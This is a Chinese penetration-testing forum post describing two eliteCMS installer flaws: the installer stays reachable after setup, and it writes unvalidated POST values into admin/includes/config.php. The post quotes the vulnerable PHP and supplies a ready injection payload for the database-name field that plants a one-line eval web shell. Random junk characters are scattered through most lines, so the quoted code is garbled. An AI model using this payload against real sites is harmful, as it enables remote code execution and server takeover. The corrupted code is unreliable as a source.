找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 eliteCMS安装文件未验证 + 一句话写入安全漏洞
返回列表 发新帖
查看: 3043|回复: 0
打印 上一主题 下一主题

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-18 13:59:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装4 |5 }; d" A0 ~5 L( n+ k5 H+ d

5 E$ ]3 D2 [  H. X- d' {* w5 D; P另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php( D0 P& j: P* X6 r1 |! a, P* v4 s9 U" ^
我们来看代码:: O3 X; P* W" P0 o

5 d) N$ ~+ P1 t+ h. C# m...
# A# d4 F- Q9 Z" o$ M% |elseif ($_GET['step'] == "4") {' @7 {6 q. \" s" q
    $file = "../admin/includes/config.php";1 Y1 F0 N% ?: p" G, `  Y
    $write = "<?php\n";& R8 x4 T0 v' N8 v. V/ H
    $write .= "/**\n";
4 O' {& B# P3 w  I    $write .= "*\n";
, q$ Y1 [; p. Z) ^) M2 H7 U    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
# ^8 w  e6 ?' C...略...! G. L# x- L5 {! F7 w" t( ?
    $write .= "*\n";
) }+ D" f% t: N& w9 ~. A    $write .= "*/\n";
  }2 G$ x3 L# W9 u8 |- |& p2 P    $write .= "\n";
; d$ o, E7 F- C2 C    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";4 V- ^. S2 c7 Y* w/ `: \) A/ ^% S
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";8 r1 C- V% Q. O7 S! W, ]
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";& V) Z) ?$ o5 ?2 W6 `$ a
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
5 E! B4 m6 v9 v5 S$ ~; _/ F    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";5 Q% K  ~) i1 t5 r# ^
    $write .= "if (!\$connection) {\n";8 P, I9 R1 T, a
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";: K; R" P; ^0 D1 ^
    $write .= "        \n";3 w$ }% M  ~" D, u( ~5 A: `
    $write .= "} \n";
5 V9 }1 f+ x7 `* \3 D    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
/ `) E& ]* g8 u    $write .= "if (!\$db_select) {\n";
8 V& |; M: j# ^' V! u/ H    $write .= "        die(\"Database select failed\" .mysql_error());\n";
1 N2 E' Q+ o- ^# V3 {. P( g    $write .= "        \n";7 Y$ G# r- g0 [3 L; q7 [' e
    $write .= "} \n";+ ~* [2 \$ N% P* T( m$ ?
    $write .= "?>\n";! }) k' t: @3 b, X

% n. Y1 _8 u4 f! G    $writer = fopen($file, 'w');& E* u- j. D" S
...2 |& w% ^4 a2 v, G& G
4 s. N. d6 `# w
在看代码:
$ ?% o" B& A+ t4 N! e, f
! I, r, i1 k, q$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];+ ]( |5 q& R& M* V6 A( H# j
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
( n$ d" A! D+ C% f$_SESSION['DB_USER'] = $_POST['DB_USER'];8 {( u7 t2 `) Z. C+ H& \" q, E
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];, p( O+ c+ _8 e- e3 t  d: R
! J' J$ n6 X. q
取值未作任何验证$ L0 ~# |, ?0 V
如果将数据库名POST数据:
* O0 P  ]1 q: @1 _ 7 R$ F7 ?  {0 M& h1 u0 g
"?><?php eval($_POST[c]);?><?php, x! X1 f( \: `
0 _: h4 n  k9 ]! y6 z! w
将导致一句话后门写入/admin/includes/config.php
& _# |% _4 X. x; [: U/ T5 F9 p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表